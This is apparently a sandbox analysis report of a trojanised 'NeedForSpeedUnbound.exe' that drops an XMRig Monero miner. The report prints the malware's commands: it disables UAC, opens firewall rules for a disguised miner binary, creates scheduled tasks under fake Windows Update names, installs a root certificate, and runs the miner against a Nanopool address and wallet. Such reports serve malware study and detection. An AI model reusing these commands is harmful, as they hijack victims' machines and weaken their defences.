xmrig | 1af6606497e794251d86c5e6a11494d1b3a7ada886fe4b8bc1af46ab381ff5a4

Analysis

max time kernel
76s
max time network
85s
platform
windows7_x64
resource
win7-20221111-es
resource tags

arch:x64arch:x86image:win7-20221111-eslocale:es-esos:windows7-x64systemwindows
submitted
08/01/2023, 10:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

NeedForSpeedUnbound.exe
Size

444.4MB
MD5

2efb5b0087a49f9bf6562dc722364260
SHA1

bc3ff27e2e58fd6ff88003444cc0770dede2bb33
SHA256

1af6606497e794251d86c5e6a11494d1b3a7ada886fe4b8bc1af46ab381ff5a4
SHA512

3bb2ba53da699e14b05d7ce040c151d77e2ebbba9fd381f321e19bd252806b327c3c8fcfdecda64a9204e9a8f230e9713c392a8a4717c1049f0470a06f854e62
SSDEEP

393216:gWQ3uWQkKo7lS6xZrwzIxiEFEOj5NVwyVGDdD80TCdJyTmQY4R7p6QD1aV9T:s+tkS6H+I8EFEOjnmfd40kGd60ET

Score

10^/10

xmrig evasion miner persistence trojan

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	NeedForSpeedUnbound.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 7 IoCs

miner

resource	yara_rule
behavioral1/files/0x00080000000126d1-70.dat	xmrig
behavioral1/files/0x00080000000126d1-72.dat	xmrig
behavioral1/files/0x00080000000126d1-82.dat	xmrig
behavioral1/memory/1980-86-0x0000000140000000-0x0000000141087000-memory.dmp	xmrig
behavioral1/memory/1980-88-0x0000000140000000-0x0000000141087000-memory.dmp	xmrig
behavioral1/files/0x00080000000126d1-97.dat	xmrig
behavioral1/memory/948-99-0x0000000140000000-0x0000000141087000-memory.dmp	xmrig

Executes dropped EXE 4 IoCs

pid	Process
1980	CompatTelRunner.exe
948	CompatTelRunner.exe
1492	WindowsUpdateBox.exe
1532	irsetup.exe

Modifies Windows Firewall 1 TTPs 4 IoCs

evasion

Modify Existing Service

T1031

pid	Process
1112	netsh.exe
856	netsh.exe
940	netsh.exe
2040	netsh.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Control Panel\International\Geo\Nation	NeedForSpeedUnbound.exe

Loads dropped DLL 7 IoCs

pid	Process
1320	taskeng.exe
1496	taskeng.exe
1492	WindowsUpdateBox.exe
1532	irsetup.exe
1212	Process not Found
1532	irsetup.exe
1532	irsetup.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	NeedForSpeedUnbound.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Windows\\SysWOW64\\WindowsUpdateBox.exe"	NeedForSpeedUnbound.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	NeedForSpeedUnbound.exe

Drops file in System32 directory 12 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\CompatTelRunner.exe	NeedForSpeedUnbound.exe
File opened for modification	C:\Windows\SysWOW64\CompatTelRunner.exe	NeedForSpeedUnbound.exe
File created	C:\Windows\SysWOW64\WinRing0x64.sys	NeedForSpeedUnbound.exe
File opened for modification	C:\Windows\SysWOW64\MicrosoftWindows.xml	NeedForSpeedUnbound.exe
File opened for modification	C:\Windows\SysWOW64\wuauclt.exe	irsetup.exe
File opened for modification	C:\Windows\SysWOW64\WinRing0x64.sys	NeedForSpeedUnbound.exe
File created	C:\Windows\SysWOW64\WindowsUpdateBox.exe	NeedForSpeedUnbound.exe
File opened for modification	C:\Windows\SysWOW64\WindowsUpdateBox.exe	NeedForSpeedUnbound.exe
File created	C:\Windows\SysWOW64\MicrosoftWindows.xml	NeedForSpeedUnbound.exe
File created	C:\Windows\SysWOW64\MicrosoftWindowsold.xml	NeedForSpeedUnbound.exe
File opened for modification	C:\Windows\SysWOW64\MicrosoftWindowsold.xml	NeedForSpeedUnbound.exe
File created	C:\Windows\SysWOW64\wuauclt.exe	irsetup.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1980	CompatTelRunner.exe
948	CompatTelRunner.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1936	schtasks.exe
1792	schtasks.exe
1852	schtasks.exe

Modifies Internet Explorer settings 1 TTPs 33 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{1A0EFDF1-8F4C-11ED-8386-6EE2660AF6F2} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000256ed27e8919d04f83812f84ee5c95da00000000020000000000106600000001000020000000a832f176dfd905d87479b259f8992ca5b27cf4b1561b6c35bdda8a9536c4dca3000000000e8000000002000020000000bf5de69a750b80d9435d8e8519db7710d8a9844b1ab2420d27e2fc9c7201a28a20000000634cd56ceeceb23386a5a00519ff3ceb4706cc54fe1bdbf75f408fae89e0d9db4000000037287eb9f017139dbe67fcb7d3f78a974bb34f4c0902ca8de94e3085c8adfd38608fe8603eaf4347d84d22b369484baf686b75e13f565e803363ac99941f233c	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000256ed27e8919d04f83812f84ee5c95da0000000002000000000010660000000100002000000090146a6a6dd0ad442b3a27db92b2b2f851689ca47d8eb88030756f7aedd1ed24000000000e80000000020000200000003dd6a0e563cfd604d4239d1a6378aa70e9a8bdccebe58bb23703ee9c773e6710900000002166776ecc79836cf77b18dc4f5830bd9c55c06df8f200812200019b2c4a329abda69a15f0b424e43d843b55b9bbd4f5c92f4e9873b0e23520b2f62e2917684d63efc4eb1dd29531d555edaac0ab0d2ac5950b9dc3799626d44ec011be038605f24b21ec8eb1133e3e06228e8ff5df023f0b365d85e31774d24a293a3d792a68f812a8e6d8ceb46e757fa43c03881b5640000000838c9e54bd82f556bb88a0a5ee951a054dfe6ec69a5831affe11d6751ede9f06edd28c033e2a2ec3bbd6546c2900429f2e55c93db380abd277241db1af1a11eb	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b0b0faf25823d901	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
848	NeedForSpeedUnbound.exe
848	NeedForSpeedUnbound.exe
1980	CompatTelRunner.exe
948	CompatTelRunner.exe
848	NeedForSpeedUnbound.exe
848	NeedForSpeedUnbound.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
1568	iexplore.exe
1932	SndVol.exe
1932	SndVol.exe

Suspicious use of SendNotifyMessage 4 IoCs

pid	Process
1932	SndVol.exe
1932	SndVol.exe
1932	SndVol.exe
1932	SndVol.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
1532	irsetup.exe
1532	irsetup.exe
1568	iexplore.exe
1568	iexplore.exe
1704	IEXPLORE.EXE
1704	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 848 wrote to memory of 1256	848	NeedForSpeedUnbound.exe	28
PID 848 wrote to memory of 1256	848	NeedForSpeedUnbound.exe	28
PID 848 wrote to memory of 1256	848	NeedForSpeedUnbound.exe	28
PID 1256 wrote to memory of 1048	1256	cmd.exe	30
PID 1256 wrote to memory of 1048	1256	cmd.exe	30
PID 1256 wrote to memory of 1048	1256	cmd.exe	30
PID 848 wrote to memory of 1808	848	NeedForSpeedUnbound.exe	31
PID 848 wrote to memory of 1808	848	NeedForSpeedUnbound.exe	31
PID 848 wrote to memory of 1808	848	NeedForSpeedUnbound.exe	31
PID 1808 wrote to memory of 1112	1808	cmd.exe	33
PID 1808 wrote to memory of 1112	1808	cmd.exe	33
PID 1808 wrote to memory of 1112	1808	cmd.exe	33
PID 848 wrote to memory of 536	848	NeedForSpeedUnbound.exe	34
PID 848 wrote to memory of 536	848	NeedForSpeedUnbound.exe	34
PID 848 wrote to memory of 536	848	NeedForSpeedUnbound.exe	34
PID 536 wrote to memory of 856	536	cmd.exe	36
PID 536 wrote to memory of 856	536	cmd.exe	36
PID 536 wrote to memory of 856	536	cmd.exe	36
PID 848 wrote to memory of 1208	848	NeedForSpeedUnbound.exe	37
PID 848 wrote to memory of 1208	848	NeedForSpeedUnbound.exe	37
PID 848 wrote to memory of 1208	848	NeedForSpeedUnbound.exe	37
PID 1208 wrote to memory of 1936	1208	cmd.exe	39
PID 1208 wrote to memory of 1936	1208	cmd.exe	39
PID 1208 wrote to memory of 1936	1208	cmd.exe	39
PID 848 wrote to memory of 2044	848	NeedForSpeedUnbound.exe	40
PID 848 wrote to memory of 2044	848	NeedForSpeedUnbound.exe	40
PID 848 wrote to memory of 2044	848	NeedForSpeedUnbound.exe	40
PID 2044 wrote to memory of 272	2044	cmd.exe	42
PID 2044 wrote to memory of 272	2044	cmd.exe	42
PID 2044 wrote to memory of 272	2044	cmd.exe	42
PID 848 wrote to memory of 792	848	NeedForSpeedUnbound.exe	43
PID 848 wrote to memory of 792	848	NeedForSpeedUnbound.exe	43
PID 848 wrote to memory of 792	848	NeedForSpeedUnbound.exe	43
PID 792 wrote to memory of 108	792	cmd.exe	45
PID 792 wrote to memory of 108	792	cmd.exe	45
PID 792 wrote to memory of 108	792	cmd.exe	45
PID 1320 wrote to memory of 1980	1320	taskeng.exe	47
PID 1320 wrote to memory of 1980	1320	taskeng.exe	47
PID 1320 wrote to memory of 1980	1320	taskeng.exe	47
PID 848 wrote to memory of 596	848	NeedForSpeedUnbound.exe	49
PID 848 wrote to memory of 596	848	NeedForSpeedUnbound.exe	49
PID 848 wrote to memory of 596	848	NeedForSpeedUnbound.exe	49
PID 596 wrote to memory of 1884	596	cmd.exe	51
PID 596 wrote to memory of 1884	596	cmd.exe	51
PID 596 wrote to memory of 1884	596	cmd.exe	51
PID 848 wrote to memory of 608	848	NeedForSpeedUnbound.exe	52
PID 848 wrote to memory of 608	848	NeedForSpeedUnbound.exe	52
PID 848 wrote to memory of 608	848	NeedForSpeedUnbound.exe	52
PID 608 wrote to memory of 1648	608	cmd.exe	54
PID 608 wrote to memory of 1648	608	cmd.exe	54
PID 608 wrote to memory of 1648	608	cmd.exe	54
PID 848 wrote to memory of 1940	848	NeedForSpeedUnbound.exe	55
PID 848 wrote to memory of 1940	848	NeedForSpeedUnbound.exe	55
PID 848 wrote to memory of 1940	848	NeedForSpeedUnbound.exe	55
PID 1940 wrote to memory of 940	1940	cmd.exe	57
PID 1940 wrote to memory of 940	1940	cmd.exe	57
PID 1940 wrote to memory of 940	1940	cmd.exe	57
PID 848 wrote to memory of 2028	848	NeedForSpeedUnbound.exe	58
PID 848 wrote to memory of 2028	848	NeedForSpeedUnbound.exe	58
PID 848 wrote to memory of 2028	848	NeedForSpeedUnbound.exe	58
PID 2028 wrote to memory of 2040	2028	cmd.exe	60
PID 2028 wrote to memory of 2040	2028	cmd.exe	60
PID 2028 wrote to memory of 2040	2028	cmd.exe	60
PID 848 wrote to memory of 748	848	NeedForSpeedUnbound.exe	61

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	NeedForSpeedUnbound.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	NeedForSpeedUnbound.exe

C:\Users\Admin\AppData\Local\Temp\NeedForSpeedUnbound.exe
"C:\Users\Admin\AppData\Local\Temp\NeedForSpeedUnbound.exe"
1⤵
- UAC bypass
- Checks computer location settings
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- System policy modification
PID:848
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /End /TN "Microsoft\Windows\MUI\WindowsUpdate" & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1256
- - C:\Windows\system32\schtasks.exe
    schtasks /End /TN "Microsoft\Windows\MUI\WindowsUpdate"
    3⤵
    PID:1048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System" dir=out action=allow program="%windir%\SysWOW64\CompatTelRunner.exe" enable=yes & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1808
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="System" dir=out action=allow program="C:\Windows\SysWOW64\CompatTelRunner.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:1112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System" dir=in action=allow program="%windir%\SysWOW64\CompatTelRunner.exe" enable=yes & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:536
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="System" dir=in action=allow program="C:\Windows\SysWOW64\CompatTelRunner.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /Create /XML "%windir%\SysWOW64\MicrosoftWindowsold.xml" /TN "Microsoft\Windows\MUI\WindowsUpdate" /F & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1208
- - C:\Windows\system32\schtasks.exe
    schtasks /Create /XML "C:\Windows\SysWOW64\MicrosoftWindowsold.xml" /TN "Microsoft\Windows\MUI\WindowsUpdate" /F
    3⤵
    - Creates scheduled task(s)
    PID:1936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /Change /TN "Microsoft\Windows\MUI\WindowsUpdate" /TR "%windir%\SysWOW64\CompatTelRunner.exe --algo rx/0 --coin monero --url stratum+tcp://xmr-eu1.nanopool.org:14444 --user 47RCAECPHnmf9S6iRUSbTbB6hyFWkLWmWUF1FswJHopqXJKLjYKABey8a6WbF3rui3hmHZQfK8gLzGnUUMKLX4H2KieWfRB.FREE --pass x --threads 2
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2044
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\MUI\WindowsUpdate" /TR "C:\Windows\SysWOW64\CompatTelRunner.exe --algo rx/0 --coin monero --url stratum+tcp://xmr-eu1.nanopool.org:14444 --user 47RCAECPHnmf9S6iRUSbTbB6hyFWkLWmWUF1FswJHopqXJKLjYKABey8a6WbF3rui3hmHZQfK8gLzGnUUMKLX4H2KieWfRB.FREE --pass x --threads 2
    3⤵
    PID:272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /Run /TN "Microsoft\Windows\MUI\WindowsUpdate" & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:792
- - C:\Windows\system32\schtasks.exe
    schtasks /Run /TN "Microsoft\Windows\MUI\WindowsUpdate"
    3⤵
    PID:108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c certutil –addstore –f root mscorp.crt & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:596
- - C:\Windows\system32\certutil.exe
    certutil –addstore –f root mscorp.crt
    3⤵
    PID:1884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /End /TN "Microsoft\Windows\MUI\WindowsUpdate" & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:608
- - C:\Windows\system32\schtasks.exe
    schtasks /End /TN "Microsoft\Windows\MUI\WindowsUpdate"
    3⤵
    PID:1648
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System" dir=out action=allow program="%windir%\SysWOW64\CompatTelRunner.exe" enable=yes & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1940
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="System" dir=out action=allow program="C:\Windows\SysWOW64\CompatTelRunner.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System" dir=in action=allow program="%windir%\SysWOW64\CompatTelRunner.exe" enable=yes & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2028
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="System" dir=in action=allow program="C:\Windows\SysWOW64\CompatTelRunner.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:2040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /Create /XML "%windir%\SysWOW64\MicrosoftWindowsold.xml" /TN "Microsoft\Windows\MUI\WindowsUpdate" /F & exit
  2⤵
  PID:748
- - C:\Windows\system32\schtasks.exe
    schtasks /Create /XML "C:\Windows\SysWOW64\MicrosoftWindowsold.xml" /TN "Microsoft\Windows\MUI\WindowsUpdate" /F
    3⤵
    - Creates scheduled task(s)
    PID:1792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /Change /TN "Microsoft\Windows\MUI\WindowsUpdate" /TR "%windir%\SysWOW64\CompatTelRunner.exe --algo rx/0 --coin monero --url stratum+tcp://xmr-eu1.nanopool.org:14444 --user 47RCAECPHnmf9S6iRUSbTbB6hyFWkLWmWUF1FswJHopqXJKLjYKABey8a6WbF3rui3hmHZQfK8gLzGnUUMKLX4H2KieWfRB.FREE --pass x --threads 2
  2⤵
  PID:1708
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\MUI\WindowsUpdate" /TR "C:\Windows\SysWOW64\CompatTelRunner.exe --algo rx/0 --coin monero --url stratum+tcp://xmr-eu1.nanopool.org:14444 --user 47RCAECPHnmf9S6iRUSbTbB6hyFWkLWmWUF1FswJHopqXJKLjYKABey8a6WbF3rui3hmHZQfK8gLzGnUUMKLX4H2KieWfRB.FREE --pass x --threads 2
    3⤵
    PID:1824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /Run /TN "Microsoft\Windows\MUI\WindowsUpdate" & exit
  2⤵
  PID:844
- - C:\Windows\system32\schtasks.exe
    schtasks /Run /TN "Microsoft\Windows\MUI\WindowsUpdate"
    3⤵
    PID:928
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c certutil –addstore –f root mscorp.crt & exit
  2⤵
  PID:1640
- - C:\Windows\system32\certutil.exe
    certutil –addstore –f root mscorp.crt
    3⤵
    PID:1368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /Create /SC ONLOGON /DELAY 0005:00 /TN "\Microsoft\Windows\MUI\CheckUpdate" /TR "%windir%\SysWOW64\WindowsUpdateBox.exe" /IT /F /RL HIGHEST & schtasks /Run /TN "\Microsoft\Windows\MUI\CheckUpdate" & exit
  2⤵
  PID:1948
- - C:\Windows\system32\schtasks.exe
    schtasks /Create /SC ONLOGON /DELAY 0005:00 /TN "\Microsoft\Windows\MUI\CheckUpdate" /TR "C:\Windows\SysWOW64\WindowsUpdateBox.exe" /IT /F /RL HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:1852
- - C:\Windows\system32\schtasks.exe
    schtasks /Run /TN "\Microsoft\Windows\MUI\CheckUpdate"
    3⤵
    PID:1164
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" https://support.microsoft.com/en-us/help/179113/how-to-install-the-latest-version-of-directx
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  PID:1568
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1568 CREDAT:275457 /prefetch:2
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:1704

C:\Windows\system32\taskeng.exe
taskeng.exe {9EDBA693-7F5B-4FB3-AC4B-2853C2F61259} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1320
- C:\Windows\SysWOW64\CompatTelRunner.exe
  C:\Windows\SysWOW64\CompatTelRunner.exe --algo rx/0 --coin monero --url stratum+tcp://xmr-eu1.nanopool.org:14444 --user 47RCAECPHnmf9S6iRUSbTbB6hyFWkLWmWUF1FswJHopqXJKLjYKABey8a6WbF3rui3hmHZQfK8gLzGnUUMKLX4H2KieWfRB.FREE --pass x --threads 2
  2⤵
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID:1980
- C:\Windows\SysWOW64\CompatTelRunner.exe
  C:\Windows\SysWOW64\CompatTelRunner.exe --algo rx/0 --coin monero --url stratum+tcp://xmr-eu1.nanopool.org:14444 --user 47RCAECPHnmf9S6iRUSbTbB6hyFWkLWmWUF1FswJHopqXJKLjYKABey8a6WbF3rui3hmHZQfK8gLzGnUUMKLX4H2KieWfRB.FREE --pass x --threads 2
  2⤵
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID:948

C:\Windows\system32\taskeng.exe
taskeng.exe {C02B6EDA-D916-4D81-930E-844F6406E0F3} S-1-5-21-3406023954-474543476-3319432036-1000:VUIIVLGQ\Admin:Interactive:[1]
1⤵
- Loads dropped DLL
PID:1496
- C:\Windows\SysWOW64\WindowsUpdateBox.exe
  C:\Windows\SysWOW64\WindowsUpdateBox.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:1492
- - C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
    "C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:5644322 "__IRAFN:C:\Windows\SysWOW64\WindowsUpdateBox.exe" "__IRCT:0" "__IRTSS:0" "__IRSID:S-1-5-21-3406023954-474543476-3319432036-1000"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - Suspicious use of SetWindowsHookEx
    PID:1532

C:\Windows\system32\SndVol.exe
SndVol.exe -f 45679732 6325
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1932

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Bypass User Account Control

T1088

Scheduled Task

T1053

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

Filesize
4.9MB

MD5
b0a1f1e0a106e1a62753c8a07fb3809b

SHA1
b4bab82aa173a401a2f16f8b4ad91105a895b2d9

SHA256
f7e07f7936269756bb73e91c8b280c2ab8532fb5bf15085d96eaebc7a05a8950

SHA512
ffc97976471e26e938e0389b33c0143b4a55653f90ee35f8220663b2a78fc48a106a204dd25c990817a57f3670d41fd1361cbdbc3bc4894ded882b356649c083

Download Submit
C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

Filesize
4.9MB

MD5
b0a1f1e0a106e1a62753c8a07fb3809b

SHA1
b4bab82aa173a401a2f16f8b4ad91105a895b2d9

SHA256
f7e07f7936269756bb73e91c8b280c2ab8532fb5bf15085d96eaebc7a05a8950

SHA512
